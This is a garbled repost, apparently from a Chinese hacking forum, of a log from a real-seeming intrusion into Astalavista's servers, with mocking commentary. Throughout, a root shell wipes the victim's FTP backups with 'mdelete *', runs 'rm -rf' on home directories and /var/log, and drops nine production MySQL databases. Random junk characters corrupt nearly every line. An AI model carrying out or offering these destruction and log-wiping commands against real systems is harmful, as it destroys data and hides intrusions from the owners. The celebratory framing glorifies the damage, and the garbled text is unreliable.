5 q" ~8 r: c, u7 S! o7 h% a0 j5 ~* V' D6 Q2 }! [/ Y8 O5 H5 F
// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…' i( `' [# |8 X4 ^% C' j2 @6 e

+ M$ B% u& }! umysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;
+ @8 N2 _$ M, O# R8 J5 G8 s, e& M5 u+——————+———————————————————————————————+4 i5 [6 G- r' R( y% U7 S) K9 i
| iss_summary      | iss_description                                                                             |) ^; f6 W8 m$ u. x; O  r
+——————+———————————————————————————————+
) u7 T( M% q. O$ _$ N0 s5 o| Website guidance | Virtual Girl which guides you trought the website.
" U- [8 M9 W% i0 g9 e4 r+ z2 N) Q2 `8 ?& o
We need a girl with who you can ( talk )!!!
+ Y4 J, p( L! c5 c$ A+ IAlso for the News!! G8 n# B$ }8 K5 Q( u+ j# d
So my suggestion is a girl who read you the news loud if you like!
2 M/ L. V% k+ `you can choose between read yourselfe or she read it for you or both!
+ n' G( W+ q7 h- B" U# X; d# z
8 U' u  g, ~6 }" nGo to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!4 @! g3 U6 K- r8 s6 b0 N# O- _
& b4 l% b) X7 w% F5 }& E) [
Have a look on the example girls!!* Z4 x! u6 g' i8 |/ ~, H

: _/ D, u& w/ V  k( c8 X& E链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]
4 Q! V, ]. A! E# l7 i8 R' r* o" u0 P' E" I6 l! ~0 \. c
or that) j+ L2 x2 j  z% D

" x$ V; ~8 ]# b+ H5 c链接标记[url]http://www.yellostrom.de/[/url]
' m' {4 E$ T8 J) P; F6 C2 }- n  m& i. l& r
|
5 I: o/ @1 n6 G; H/ I+——————+———————————————————————————————+
; y2 U1 Q2 D; B3 ~% z8 F' l0 T1 row in set (0.00 sec)% {; D: @2 D8 ~; O

0 k( h! C( H/ x, O  j) J' L// ha ha.( ]4 d  ]6 i& G3 D
& y! R( R# M5 p- G* ^9 L
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
# _3 Q2 r# [+ |* m+————————–+———————————————————————————————————–+
2 |* f: S6 V, q- d8 c  m$ {| iss_summary              | iss_description                                                                                           |) B- _; z% e& T( f3 J
+————————–+———————————————————————————————————–+& M8 r# B, l5 `7 v8 P" v' w
| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name.  |
( ^, x& ?8 q# j$ W, q+————————–+———————————————————————————————————–+
. u( [2 T8 Q+ e1 s0 b! W* |5 o' `1 row in set (0.00 sec)3 ~7 m9 Y( S" B3 M; L
% H, x, g0 c! ?4 l! k/ |
// LOL.7 B2 y4 `/ T' e- Y  j

2 B* W5 A0 {) F% m1 Nmysql> exit
2 j8 D* O+ a" F3 k; o& bBye6 W& B0 n5 ^5 y0 ]) l

- Q; m3 V0 s" Tsh-3.2# ftp 212.254.194.163( `3 j- a9 H! o6 [  f' U
Connected to 212.254.194.163.
! `3 \. j3 }1 O+ p0 F220 BackupCOM_VW FTP server ready.
% S0 R1 j8 P/ c/ S8 E1 t# j. j504 AUTH: security mechanism ‘GSSAPI’ not supported.5 h3 s& c: I, j- q! F7 U
504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.
/ T& B, E) {' X0 y. zKERBEROS_V4 rejected as an authentication type
) P% v! j$ |& cName (212.254.194.163:root): astalavista.com
5 R& h+ u4 W% ]; \6 D331 Password required for astalavista.com.1 s8 [0 E  m9 h) f; Z* u
Password:4 D% J4 Z' d' T  j. m
230 User astalavista.com logged in.5 ]" V2 a1 u. H5 a3 n+ f6 s
Remote system type is UNIX.( W' M5 W4 N6 @% `" u: T
Using binary mode to transfer files.
6 N3 |8 i: o. @8 M, Z9 N( lftp> ls -la
4 x3 m. V% U' Q2 G9 r227 Entering Passive Mode (212,254,194,163,2,188)2 T  h1 V7 y* a3 W3 d/ d4 P
150 Opening BINARY mode data connection for ‘file list’.
% W9 G& V1 Z2 `8 |! [dr-x——   1 root users         4096 Jun  4 06:13 astalavista.com( N4 d* F7 K$ S
226 Transfer complete.4 c) B( q$ s2 O
ftp> cd astalavista.com9 _1 K6 D$ b3 W+ T: o" L
250 CWD command successful." H! q* M8 ~* Y& M- Q
ftp> ls -la. I2 u  [4 j$ A3 {3 D# a9 F# Y
227 Entering Passive Mode (212,254,194,163,2,189)) ?$ c; L5 |9 ?+ ]
150 Opening BINARY mode data connection for ‘file list’.& `! N7 y  G7 a
-rw-rw-rw-   1 astalavista.com users     23410936878 Apr 29 22:10 09-04-28-astacom_full.tar
/ g, i7 @& W% ^9 F) F3 D-rw-rw-rw-   1 astalavista.com users     20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2# u+ [. G0 ]9 Y# X1 D
-rw-rw-rw-   1 astalavista.com users        88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz22 w) Y2 y8 @6 g
-rw-rw-rw-   1 astalavista.com users     26413034040 May  2 00:21 09-05-01-astacom-Public_HTML.tar% T8 K7 W# ~5 O# H
-rw-rw-rw-   1 astalavista.com users       277843549 May  1 17:29 09-05-01-astacom-SQL_Dump.tar. J2 P0 F- v* q" b$ O- z; q+ ]: q
[snip]5 b/ a% Z7 s! O6 N& l4 E
226 Transfer complete.
/ Q, ?9 M+ n" y8 r1 L+ }ftp> mdelete *
, w% `  i! y; i  w! ]ftp> ls -la1 r! U) r7 \. q( f' [1 x
227 Entering Passive Mode (212,254,194,163,2,193)
8 m) f! p' q+ j9 O8 J1 s, P150 Opening BINARY mode data connection for ‘file list’.
. O7 x5 }4 @" v8 m1 \* b0 k226 Transfer complete., ?6 n+ p9 `  {' e0 c6 J0 E
ftp>
* j2 @+ F% T8 l
5 A$ l7 O' F2 a0 p9 S. C; Tsh-3.2# cd /home4 t! }3 Q' B& E, [$ o7 u
sh-3.2# ls -la
5 n5 O8 U- G3 k: M6 Ktotal 120
& m( Z3 ?  v& @6 odrwxr-xr-x 14 root    root     4096 Mar 11 17:56 .; S2 d; |: G+ o9 [# Y1 t& n5 V
drwxr-xr-x 25 root    root     4096 Jun  3 02:43 ..
2 v3 m5 g7 K2 _+ o- d+ Kdrwx–x–x  9 admin   admin    4096 Nov 28  2007 admin, ?; Z+ h3 ^6 h
-rw——-  1 root    root     8192 Jun  4 03:03 aquota.group4 _& A8 m* n9 L
-rw——-  1 root    root     8192 Jun  3 02:45 aquota.user
! f/ a% C: }' f' U% {4 g  X  gdrwx–x–x  6 astanet astanet  4096 Jun  4 09:51 astanet7 o. I3 y: A. q. z
drwxr-xr-x  2 root    root     4096 Jul 29  2008 backup7 j+ ?, ]* Q) v
drwxr-xr-x  2 root    root     4096 Sep 17  2008 backup.14161
9 e3 O; `/ a. ]- `- s* L# c& \drwx–x–x 10 com     com      4096 Apr 28 12:40 com7 S* _( _0 ]! x: _9 |& _( ^: F
drwxr-xr-x  2 root    root     4096 May 17  2007 ftp
6 K$ Q5 J" o6 Fdrwx——  3 jon     jon      4096 Sep 21  2007 jon  H' l- q: B( t$ ?6 B- D- E4 u/ N
drwx——  2 root    root    16384 Sep 11  2007 lost+found1 g9 t" y" {. k/ w! H8 ?; E$ [
drwxr-xr-x  2 root    root     4096 Sep 14  2007 my6 W% w2 b9 E& K5 C3 K# [
drwxr-xr-x  5 mysql   mysql    4096 Sep 24  2007 mysqldata
4 Q0 i8 D9 q4 l6 |! A6 C- pdrwx——  2 jon     jon      4096 Sep 15  2007 test
# p" U$ L* E4 }: m9 [2 _drwxrwxrwt  2 root    root     4096 Jul 29  2008 tmp
1 I! ?5 A' k; a1 D0 ]" M6 w
' f! }# L) d, A( U6 G: esh-3.2# rm -rf backup/9 D! l* l7 W0 ]
sh-3.2# rm -rf backup.14161/
. _7 M; W+ w+ u- V* t0 i8 ysh-3.2# rm -rf ftp/
  D1 F. |5 j# U9 v& v2 d. f$ c- Q( ^sh-3.2# rm -rf jon/
" j/ g# F. @" t3 H7 |- x! \* Qsh-3.2# rm -rf my/8 H# v7 V$ ]8 T3 z; d5 o
sh-3.2# rm -rf mysqldata/
# F- I" Q6 I  [- hsh-3.2# rm -rf test/
) Y8 g% U* ^/ q* H$ ush-3.2# rm -rf tmp/
/ W7 }* I* A1 t. ?* Q% T7 N  l# [sh-3.2# cd ~- U) h; v* e0 _& e' o
sh-3.2# rm -rf *
+ n& P* z% G0 N# l7 H% J. Hsh-3.2# rm -rf /var/log/% X* g/ }+ d! Z0 n, Q
rm: cannot remove directory `/var/log//proftpd’: Directory not empty
7 n& C" e- Z& B, X* J/ Bsh-3.2# rm -rf /home/*
2 H# |( A3 p1 }0 \: zsh-3.2# mysql% ?! V  P% U% e& L
Welcome to the MySQL monitor.  Commands end with ; or \g.. ]- }4 ~2 J% B( s4 I' R% o8 H: H0 X# F
Your MySQL connection id is 407156
/ ?! I- u* J3 s! U3 qServer version: 5.0.45-community-log MySQL Community Edition (GPL)
9 {/ |8 \% a, z2 U6 u& J
; g% [+ P5 Z! a* f8 h6 k& ]Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
, k" m6 S0 b  `* o
6 O1 `6 p5 U$ Q( Imysql> show databases;
4 ^% |; f& A( }, q, B  |3 u+———————–+- @% M4 S+ }; q
| Database              |, n5 a: S$ p- }" d* D
+———————–+
, t' f5 P: {% I9 v3 y+ g| information_schema    |
% y: P) D. [* Z# h. V| astanet_ads           |. }" ^2 i4 o6 t& D  H0 w+ X
| astanet_mailing_lists |
5 @" s# ~( M2 s' }  `, Z7 ^| astanet_mediawiki     |
/ A2 w* Q+ B/ D7 A0 s| astanet_membersystem  |7 R+ L' z/ x$ y
| com_contrexx          |- k+ P1 f+ Z7 H' Z4 Y
| com_contrexx2         |
1 Z. o; b" @8 A  H" Z| com_contrexx2_live    |, D5 J1 |' K0 a) ]2 C6 R8 c6 i( Y
| da_roundcube          |
, P% s3 ^- x$ a$ f5 X0 h| dolphin               |$ f- S* d6 M4 T& ^
| ideapool              |
5 S6 i$ n5 o/ b* Q8 B8 G5 I| mysql                 |
5 R6 }( Z9 j, N4 B8 v( D- o| test                  |6 V9 a5 |7 q- S/ p
| yourmaster            |
' D  z$ B( n; m+ |9 g3 v+———————–+
# B3 T) D; v2 z, l( O14 rows in set (0.03 sec)/ e' v7 b8 T1 @1 [. N
* Y& R0 f) s" M1 {; B
mysql> drop database astanet_membersystem;
2 v6 |4 C* \  Z) NdroQuery OK, 46 rows affected (0.81 sec)& e# D: U' b* p0 ?( O# ~+ |

7 G3 _- ]+ }, J, Ymysql> drop database com_contrexx;6 U! D; f" @; z5 P
Query OK, 211 rows affected (2.72 sec)) A! {# u& g' X% i8 A

2 j$ C5 O7 E; f& o7 q1 Emysql> drop database com_contrexx2;
( y; B) b1 m/ M. WQuery OK, 237 rows affected (2.23 sec)) T. v; k6 Y/ T% U# Y" q# {

; p+ @# f9 Q" n, x3 r; v/ Xmysql> drop database com_contrexx2_live;0 r$ N3 {) N& n; K0 C
Query OK, 227 rows affected (7.63 sec)* E. A3 I, e, \0 t: h4 s+ Q0 z
2 W% S/ u. z$ l. y
mysql> drop database ideapool;% ?8 a7 |$ {0 x. \9 d
Query OK, 69 rows affected (0.19 sec). r) C- r0 x: |4 a& l+ s

4 Y! |5 y  B; Vmysql> drop database yourmaster;
% O6 n) ?  U* b# r7 R0 a/ EQuery OK, 158 rows affected (0.55 sec)
2 i+ E2 A0 g) O5 n, u# H0 p/ W
5 {; `2 G$ {7 h: dmysql> drop database astanet_ads;
5 y8 K( L  ^7 }4 QQuery OK, 9 rows affected (0.11 sec)
9 d. `; K& f# r) h: [" A; v7 C2 E) O1 F1 q
mysql> drop database astanet_mailing_lists;* P& H3 K9 m% Z
Query OK, 24 rows affected (1.47 sec)6 B0 a, J' l6 K- _: U8 }) T9 n) o) R
* ~% F/ P6 c/ `- S- G3 I
mysql> drop database astanet_mediawiki;8 f# @5 q( T: e3 I/ E9 a
Query OK, 31 rows affected (0.51 sec)! N, [, M- c/ p! a+ e& i3 T
$ K8 ~) O3 c. B& H
mysql> show databases;
# v. p7 S& H; Y( V+——————–+- {, V/ d1 K, ?9 k1 K4 L8 _' C- |
| Database           |
7 V  r9 o4 L4 P4 \* ~) ~+——————–+
9 E, ?6 y* c' b4 A+ s$ j| information_schema |
) n# b. c& ]1 ~/ T6 Z5 G6 a. M| da_roundcube       |
% Z& z9 r! V' @* }$ {| dolphin            |. V# ?9 [+ ^* R  [- `
| mysql              |
7 p. J0 ^' r* G" U" Y; @% c$ n| test               |6 q8 p5 g2 C4 i( h
+——————–+
9 F6 y! o$ d- {( q8 e3 s2 c5 rows in set (0.00 sec): I9 g0 c9 A' ~0 R" e
. p4 D& w! h# Q3 @
What a journey! We’re not sure exactly why the “Terminator” had any influence on9 p) ]  W0 t" u% W3 g
their naming (conventions) but we’re sure Arnold himself wouldn’t be in the" G; X: M; h, m8 Q' ?
wrong to say this pack of morons *wont be back*.& k% _  P  F& ~3 a3 j( `




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2